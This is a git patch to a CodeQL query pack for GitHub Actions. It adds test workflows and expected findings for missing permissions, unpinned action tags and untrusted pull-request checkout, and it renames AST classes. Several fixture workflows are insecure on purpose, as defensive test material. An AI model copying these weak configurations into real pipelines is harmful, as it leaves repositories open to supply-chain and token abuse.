a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml new file mode 100644 index 000000000000..f000ad6a287a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml @@ -0,0 +1,10 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml new file mode 100644 index 000000000000..b34dfeec641c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml @@ -0,0 +1,13 @@ +on: + pull_request + +permissions: {} + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected new file mode 100644 index 000000000000..174f9d49e875 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -0,0 +1 @@ +| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref new file mode 100644 index 000000000000..ad1c6a996609 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -0,0 +1,2 @@ +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/actor_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml new file mode 100644 index 000000000000..992686fb5aa8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -0,0 +1,11 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: foo/bar + - uses: foo/bar@v1 + - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/untrusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected new file mode 100644 index 000000000000..169d9c9ac2b1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -0,0 +1,7 @@ +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref new file mode 100644 index 000000000000..8c9db66bf6bb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected new file mode 100644 index 000000000000..76d47eec1912 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -0,0 +1 @@ +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref new file mode 100644 index 000000000000..b0c41e712e50 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckout.ql From 0eabdd9507685da01ff505fb88fc338cba4a8761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 09:44:33 +0100 Subject: [PATCH 081/707] Rename classes --- ql/lib/codeql/actions/Ast.qll | 261 +++++++++--------- .../actions/controlflow/BasicBlocks.qll | 1 - .../actions/controlflow/internal/Cfg.qll | 101 +++---- .../codeql/actions/dataflow/ExternalFlow.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 6 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 59 ++-- .../dataflow/internal/DataFlowPublic.qll | 12 +- ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 4 +- .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 4 +- .../CWE-020/ReusableWorkflowsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../CWE-275/MissingActionsPermissions.ql | 8 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 +- ql/test/library-tests/test.expected | 61 +--- ql/test/library-tests/test.ql | 44 ++- 22 files changed, 285 insertions(+), 333 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bbf5c8ac0d7..881daf133367 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. Based on YamlNode from the Yaml library. + * Base class for thejAST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -14,20 +14,16 @@ class AstNode instanceof YamlNode { string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } Location getLocation() { result = super.getLocation() } -} -/** - * A statement is a group of expressions and/or statements that you design to carry out a task or an action. - * Any statement that can return a value is automatically qualified to be used as an expression. - */ -class Statement extends AstNode { - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } /** - * Gets a environment variable expression by name in the scope of the current step. + * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { + EnvExpr getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -40,37 +36,32 @@ class Statement extends AstNode { } } -/** - * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. - */ -class Expression extends Statement { } - /** * A composite action */ -class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { - RunsStmt getRunsStmt() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof Actions::CompositeAction { + Runs getRuns() { result = super.getRuns() } - InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } } -class RunsStmt extends Statement instanceof Actions::Runs { - StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } +class Runs extends AstNode instanceof Actions::Runs { + Step getAStep() { result = super.getSteps().getElementNode(_) } - StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } + Step getStep(int i) { result = super.getSteps().getElementNode(i) } } /** * A Github Actions Workflow */ -class WorkflowStmt extends Statement instanceof Actions::Workflow { +class Workflow extends AstNode instanceof Actions::Workflow { string getName() { result = super.getName() } - JobStmt getAJobStmt() { result = super.getJob(_) } + Job getAJob() { result = super.getJob(_) } - JobStmt getJobStmt(string id) { result = super.getJob(id) } + Job getJob(string id) { result = super.getJob(id) } predicate hasTriggerEvent(string trigger) { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) @@ -80,27 +71,25 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } -class ReusableWorkflowStmt extends WorkflowStmt { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; - ReusableWorkflowStmt() { - this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call - } + ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } } -class InputsStmt extends Statement instanceof YamlMapping { +class Inputs extends AstNode instanceof YamlMapping { YamlMapping parent; - InputsStmt() { parent.lookup("inputs") = this } + Inputs() { parent.lookup("inputs") = this } /** * Gets a specific input expression (YamlMapping) by name. @@ -111,10 +100,10 @@ class InputsStmt extends Statement instanceof YamlMapping { } } -class OutputsStmt extends Statement instanceof YamlMapping { +class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; - OutputsStmt() { parent.lookup("outputs") = this } + Outputs() { parent.lookup("outputs") = this } /** * Gets a specific output expression (YamlMapping) by name. @@ -127,10 +116,16 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } -class StrategyStmt extends Statement instanceof YamlMapping { +class Permissions extends AstNode instanceof YamlMapping { YamlMapping parent; - StrategyStmt() { parent.lookup("strategy") = this } + Permissions() { parent.lookup("permissions") = this } +} + +class Strategy extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Strategy() { parent.lookup("strategy") = this } /** * Gets a specific matric expression (YamlMapping) by name. @@ -144,31 +139,10 @@ class StrategyStmt extends Statement instanceof YamlMapping { } } -class InputExpr extends Expression instanceof YamlString { - InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } -} - -class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { - exists(OutputsStmt outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -class MatrixVariableExpr extends Expression instanceof YamlString { - MatrixVariableExpr() { - exists(StrategyStmt outputs | - outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this - ) - } -} - /** * A Job is a collection of steps that run in an execution environment. */ -class JobStmt extends Statement instanceof Actions::Job { +class Job extends AstNode instanceof Actions::Job { /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. @@ -176,20 +150,20 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStepStmt(int index) { result = super.getStep(index) } + Step getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStepStmt() { result = super.getStep(_) } + Step getAStep() { result = super.getStep(_) } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - JobStmt getNeededJob() { + Job getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and - result = needs.getANeededJob().(JobStmt) + result = needs.getANeededJob() ) } @@ -199,7 +173,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -209,42 +183,42 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + JobUses getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } /** * A Step is a single task that can be executed as part of a job. */ -class StepStmt extends Statement instanceof Actions::Step { +class Step extends AstNode instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJobStmt() { result = super.getJob() } + Job getJob() { result = super.getJob() } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class IfStmt extends Statement { +class If extends AstNode { YamlMapping parent; - IfStmt() { + If() { (parent instanceof Actions::Step or parent instanceof Actions::Job) and parent.lookup("if") = this } - Statement getEnclosingStatement() { result = parent } + AstNode getEnclosingNode() { result = parent } string getCondition() { result = this.(YamlScalar).getValue() } } @@ -252,7 +226,7 @@ class IfStmt extends Statement { /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class UsesExpr extends Expression { +abstract class Uses extends AstNode { abstract string getCallee(); abstract string getVersion(); @@ -263,10 +237,10 @@ abstract class UsesExpr extends Expression { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUsesExpr extends StepStmt, UsesExpr { +class StepUses extends Step, Uses { Actions::Uses uses; - StepUsesExpr() { uses.getStep() = this } + StepUses() { uses.getStep() = this } override string getCallee() { result = uses.getGitHubRepository() } @@ -288,12 +262,10 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlMapping { - JobUsesExpr() { - this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) - } +class JobUses extends Uses instanceof YamlMapping { + JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJobStmt() { result = this } + Job getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -336,35 +308,70 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { /** * A Run step represents the evaluation of a provided script */ -class RunExpr extends StepStmt, Expression { +class Run extends Step { Actions::Run scriptExpr; - RunExpr() { scriptExpr.getStep() = this } + Run() { scriptExpr.getStep() = this } Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } } +/** + * An AST node associated with a Reusable Workflow input. + */ +class InputExpr extends AstNode { + InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +} + +/** + * An AST node holding an Env var value. + */ +class EnvExpr extends AstNode { + EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +} + +/** + * An AST node holding a job or workflow output var. + */ +class OutputExpr extends AstNode { + OutputExpr() { + exists(Outputs outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } +} + +/** + * An AST node holding a matrix var. + */ +class MatrixVariableExpr extends AstNode { + MatrixVariableExpr() { + exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) + } +} + /** * Evaluation of a workflow expression ${{}}. */ -class ExprAccessExpr extends Expression instanceof YamlString { +class Expression extends AstNode instanceof YamlString { string expr; - ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = Actions::getASimpleReferenceExpression(this) } string getExpression() { result = expr } - JobStmt getJobStmt() { result.getAChildNode*() = this } + Job getJob() { result.getAChildNode*() = this } } /** - * A context access expression. + * A ${{}} expression accessing a context variable. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -class CtxAccessExpr extends ExprAccessExpr { - CtxAccessExpr() { +class ContextExpression extends Expression { + ContextExpression() { expr.regexpMatch([ stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), matrixCtxRegex() @@ -373,7 +380,7 @@ class CtxAccessExpr extends ExprAccessExpr { abstract string getFieldName(); - abstract Expression getRefExpr(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -406,11 +413,11 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsCtxAccessExpr extends CtxAccessExpr { +class StepsExpression extends ContextExpression { string stepId; string fieldName; - StepsCtxAccessExpr() { + StepsExpression() { expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and fieldName = expr.regexpCapture(stepsCtxRegex(), 2) @@ -418,9 +425,9 @@ class StepsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and - result.(StepStmt).getId() = stepId + result.(Step).getId() = stepId } } @@ -429,12 +436,12 @@ class StepsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsCtxAccessExpr extends CtxAccessExpr { - JobStmt job; +class NeedsExpression extends ContextExpression { + Job job; string jobId; string fieldName; - NeedsCtxAccessExpr() { + NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and jobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -445,14 +452,14 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputsStmt() = result + job.getOutputs() = result or // reusable workflow calling jobs - job.getUsesExpr() = result + job.getUses() = result ) } } @@ -462,11 +469,11 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsCtxAccessExpr extends CtxAccessExpr { +class JobsExpression extends ContextExpression { string jobId; string fieldName; - JobsCtxAccessExpr() { + JobsExpression() { expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and fieldName = expr.regexpCapture(jobsCtxRegex(), 2) @@ -474,11 +481,11 @@ class JobsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(JobStmt job | + override AstNode getTarget() { + exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputsStmt() = result + job.getOutputs() = result ) } } @@ -488,21 +495,23 @@ class JobsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsCtxAccessExpr extends CtxAccessExpr { +class InputsExpression extends ContextExpression { string fieldName; - InputsCtxAccessExpr() { + InputsExpression() { expr.regexpMatch(inputsCtxRegex()) and fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) - or - exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) + ( + exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + or + exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + ) } } @@ -511,18 +520,18 @@ class InputsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvCtxAccessExpr extends CtxAccessExpr { +class EnvExpression extends ContextExpression { string fieldName; - EnvCtxAccessExpr() { + EnvExpression() { expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(Statement s | + override AstNode getTarget() { + exists(AstNode s | s.getEnvExpr(fieldName) = result and s.getAChildNode*() = this ) @@ -534,24 +543,24 @@ class EnvCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixCtxAccessExpr extends CtxAccessExpr { +class MatrixExpression extends ContextExpression { string fieldName; - MatrixCtxAccessExpr() { + MatrixExpression() { expr.regexpMatch(matrixCtxRegex()) and fieldName = expr.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(WorkflowStmt w | - w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + override AstNode getTarget() { + exists(Workflow w | + w.getStrategy().getMatrixVariableExpr(fieldName) = result and w.getAChildNode*() = this ) or - exists(JobStmt j | - j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + exists(Job j | + j.getStrategy().getMatrixVariableExpr(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll index cdc7b0cf24f1..af5e0f62552f 100644 --- a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -442,4 +442,3 @@ class ConditionBlock extends BasicBlock { */ predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } } - diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index b8137172b8c9..2bc867234931 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -83,9 +83,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + class WorkflowScope extends CfgScope instanceof Workflow { } - class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } + class CompositeActionScope extends CfgScope instanceof CompositeAction { } } private module Implementation implements CfgShared::InputSig { @@ -119,13 +119,13 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(WorkflowStmt), e) or - first(scope.(CompositeActionStmt), e) + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) } predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(WorkflowStmt), e, c) or - last(scope.(CompositeActionStmt), e, c) + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -143,14 +143,14 @@ private import CfgImpl private import Completion private import CfgScope -private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(CompositeActionStmt).getInputsStmt() or - child = this.(CompositeActionStmt).getOutputsStmt() or - child = this.(CompositeActionStmt).getRunsStmt() + child = this.(CompositeAction).getInputs() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() ) and l = child.getLocation() | @@ -161,21 +161,21 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos } } -private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { - override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } } -private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { override ControlFlowTree getChildNode(int i) { - if this instanceof ReusableWorkflowStmt + if this instanceof ReusableWorkflow then result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflowStmt).getInputsStmt() or - child = this.(ReusableWorkflowStmt).getOutputsStmt() or - child = this.(ReusableWorkflowStmt).getStrategyStmt() or - child = this.(ReusableWorkflowStmt).getAJobStmt() + child = this.(ReusableWorkflow).getInputs() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -185,10 +185,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ) else result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAJobStmt() or - child = super.getStrategyStmt() + child = super.getAJob() or + child = super.getStrategy() ) and l = child.getLocation() | @@ -199,10 +199,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class InputsTree extends StandardPreOrderTree instanceof Inputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getInputExpr(_) and l = child.getLocation() | child @@ -212,12 +212,10 @@ private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { } } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getOutputExpr(_) and l = child.getLocation() | child @@ -227,12 +225,10 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { +private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getMatrixVariableExpr(_) and l = child.getLocation() | child @@ -242,17 +238,15 @@ private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt } } -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class JobTree extends StandardPreOrderTree instanceof JobStmt { +private class JobTree extends StandardPreOrderTree instanceof Job { override ControlFlowTree getChildNode(int i) { result = - 